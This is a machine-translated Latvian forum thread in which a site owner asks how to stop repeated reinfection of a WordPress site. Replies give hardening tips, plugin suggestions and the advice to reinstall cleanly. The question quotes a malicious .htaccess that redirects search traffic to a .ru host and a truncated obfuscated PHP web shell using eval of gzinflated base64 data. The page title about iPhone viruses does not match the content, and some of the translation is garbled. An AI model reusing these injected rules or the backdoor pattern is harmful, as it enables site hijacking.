Kā pārbaudīt iPhone vīrusu

Tā kā robotprogrammatūras uzbrūk klienta vietnei, tā ir maz. Es esmu mainījis vietnes avotu (tagad ir WordPress pēdējā versija), mēģināju notīrīt, bet robots atrod spraugu ...

Pēc robota darbības vietnē es varu atrast .htaccess failus ar šo iekšpusi:

ErrorDocument 400 http://**********.ru/upday/index.php ErrorDocument 401 http://**********.ru/upday/index.php [...] RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite| altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search| metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex| rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch |yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search |walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick |terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey |galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro |suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase |schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*) RewriteRule ^(.*)$ http://*******.ru/upday/index.php [R=301,L] [...] 

Savos žurnāla failos varu atrast izmantoto failu .htaccess pievienošanai:

77.84.28.xxx domain.tdl - [23/Feb/2012:00:00:00 +0100] 'POST /fichiers/cookiemw5.php HTTP/1.1' 200 34 '-' '-' 

Ar šo kodu iekšpusē:

<?php $auth_pass='';$color='#df5';$default_action='FilesMan';$default_use_ajax=true; $default_charset='Windows-1251';preg_replace('/.*/e','\x65\x76\x61\x6C\x28\x67\x7A \x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64 \x65\x28'7X1re9s2z/Dn9VcwmjfZq+PYTtu7s2MnaQ5t2jTpcugp6ePJsmxrkS1PkuNkWf77C4Ck REqy43S738N1vbufp7FIEARJkARBAHT7xRVnNIlui4XO6d7Jx72TC/PN2dmHzjl8dbZf7x2dmd9KJXbHC tPQCbYHzjgKWYtZQWDdFo3Xvj/wHKPMjFNvGkzwx/vTo1d+hL9cq2MF9tC9dgL8/GKNe84N/jqxRl0PEk tN5vaLk8AZdEZWZA+L5prJKswdTTy/5xTNv82yWm0J8sw1FxMfoHXoWD0nKFLuWq1SZc+qz9iRH7F9fzru mVCvc+NGTXYP/9tyx24ndKKi6QSBH3Q8f2CWj84PDwEqyYPUDuWHZrmq5Yysm45z49jTyPXHncgdOQICcu mz47kjNyrGaSNr4NqdP6d+5ISdYDpGGJ7bc/ruGNr96fS4A607PTg+gsaa9cpzk3fVIF18MLGL1OL+dGwj AQzKhlHgTkLPCodOWCzQSCFI4 [...] 

Es izdzēstu .php failus, .htaccess failus, bet tie parādās pēc stundām vai minūtēm ... Kas ir jādara, lai atrastu robu / apturētu robotu uzbrukumu?

(tas ir koplietošanā (ovh.com)

  • iespējams lietotāju dublikāts bieži saka, ka mana vietne ir inficēta, bet vai nevarat atrast tam pierādījumus?

Drošības pamati

Tā kā WordPress ir tik populārs, daudzi hacki var pieklauvēt, izmantojot pamata drošības trūkumus. Visiem WordPress lietotājiem ir jāveic šādi vienkārši un vienkārši soļi, lai sevi aizsargātu: -

  • Neizmantojiet wp_ kā datu bāzes tabulas prefiksu, izmantojiet jebkuru nejaušu rakstzīmju virkni, kas uzrunā.
  • Izslēdziet Wordpress DB kļūdas.
  • Pārliecinieties, ka direktorija iestatījumi ir chmod 755 un faili 644.
  • Izmantojiet drošu paroļu ģeneratoru (izmantojiet vismaz 15 rakstzīmes).
  • Nelietojiet admin kā lietotājvārdu.
  • Ievietojiet tukšu .htaccess failu wp-admin direktorijā.
  • Lasiet WordPress sacietēšanu
  • Pārbaudiet, vai jūsu vietnes Google kešatmiņā nav paslēptu ļaunprātīgu programmatūru.
  • Noņemt <meta name='generator' content='WordPress X.X.X' /> no savas vietnes galvenes, ievietojot remove_action('wp_head', 'wp_generator'); jūsu files.php failā (uzbrucēju vadīts disks nebūs vienkāršs veids, kā atrast versiju, uz kuru viņi mērķē).

TimThumb Hack

Ir arī ļoti populārs uzlaušanas disks, kas saistīts ar populārā tim thumb skripta veco versiju, kas tīmekļa pārziņiem rada daudz problēmu. Lai to izvairītos, pārbaudiet, vai php faili nav augšupielāžu direktorijā, un pārliecinieties, vai esat jauninājis uz jaunāko skripta versiju.

Padoms

Es darbinu apmēram 10 dažādus WordPress failus un esmu atradis nenovērtējamu vietnes Defender spraudni un kontu WP-Security, tas regulāri skenē jūsu vietni un pa e-pastu ziņo par drošības kļūdām, ļaunprātīgu programmatūru un pat lapu kļūdām, lai jūs varētu būt drošs, ka zināt, kad kaut kas ir noticis noiet greizi.

WP-Firewall ir arī ļoti noderīgs aizsardzībai pret 0 dienu izmantojumiem, un VirusTotal ir ērts, ja jums ir aizdomas par infekciju.

Akismet un Disqus.com ir noderīgi rīki aizsardzībai pret komentāru surogātpastu, un jums par šo tēmu jāizlasa tīmekļa pārziņu profesionāļu kopienas wiki.

Tīmekļa pārziņa rīki

Jums vajadzētu arī reģistrēties tīmekļa pārziņa rīkiem, bet, ja jums ir aizdomas par infekciju, veiciet visas darbības, lai vispirms to atrastu un notīrītu vai arī jūs varat nonākt pie tā, ka Google brīdina savus lietotājus, ka jūsu vietne ir uzbrukuma vietne, par kuru ziņots.

Ja tā atklāj infekciju, Google nosūtīs e-pastu uz visām šīm adresēm [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected], [email protected] tāpēc jums jāpārliecinās, ka jums ir vismaz viens no tiem un uzraudzīts.

Apmaksātie pārvietošanas pakalpojumi / Kur saņemt palīdzību

Es arī būtu vairākas vietnes, kurās tiek piedāvāti apmaksāti ļaunprātīgas programmatūras noņemšanas pakalpojumi ļoti aizdomīgi no tiem - daudzi, šķiet, ir tāda vai cita veida izkrāpšana.

Ir pieejams daudz augstas kvalitātes palīdzības un atbalsta par brīvu WordPress forumos, šeit Webmaster Pro's, WordPress stackexchange vietnē un stackoverflow. Nemaksājiet par lietām, kuras pats varat salabot.

  • @bux nav problēmu, pārbaudiet, vai augšupielāžu direktorijā nav izpildāmo failu, tas ir visizplatītākais uzbrukuma vektors.
  • Vai varat sīkāk pastāstīt, ko dara tukšais htaccess fails wp-admin?
  • @joshuahedlund tas bija paredzēts, lai bloķētu uzbrukumu, kas mēģināja ierakstīt htaccess failu wp-admin direktorijā. Es drīz atjaunināšu šo padomu ar jaunu kodu, lai ar paroli aizsargātu šo vietnes teritoriju un pilnībā bloķētu piekļuvi tai.

Jums ir pilnībā jānoņem visi faili no savas vietnes un jāveic jauna Wordpress instalēšana. Izredzes ir, ka tie ir augšupielādējuši failus, kas viņiem ļauj nepārtraukti piekļūt jūsu vietnei. Labākais, ko varat darīt, ja vien nevēlaties pāriet pa failiem, mēģinot noskaidrot, kurš (-ie) tie ir pilnīgs instalēšana no nulles.

  • Okey, nav brīnumains risinājums hehe ^^ Man ir fotoattēlu mape ar tūkstoš failiem. Būs jautri pārbaudīt šo daļu ^ ^
  • Ja jums ir dublējums, arī tas var būt noderīgs.

strādāja par jums: Charles Robertson | Vēlies ar mums sazināties?

noderīga informācija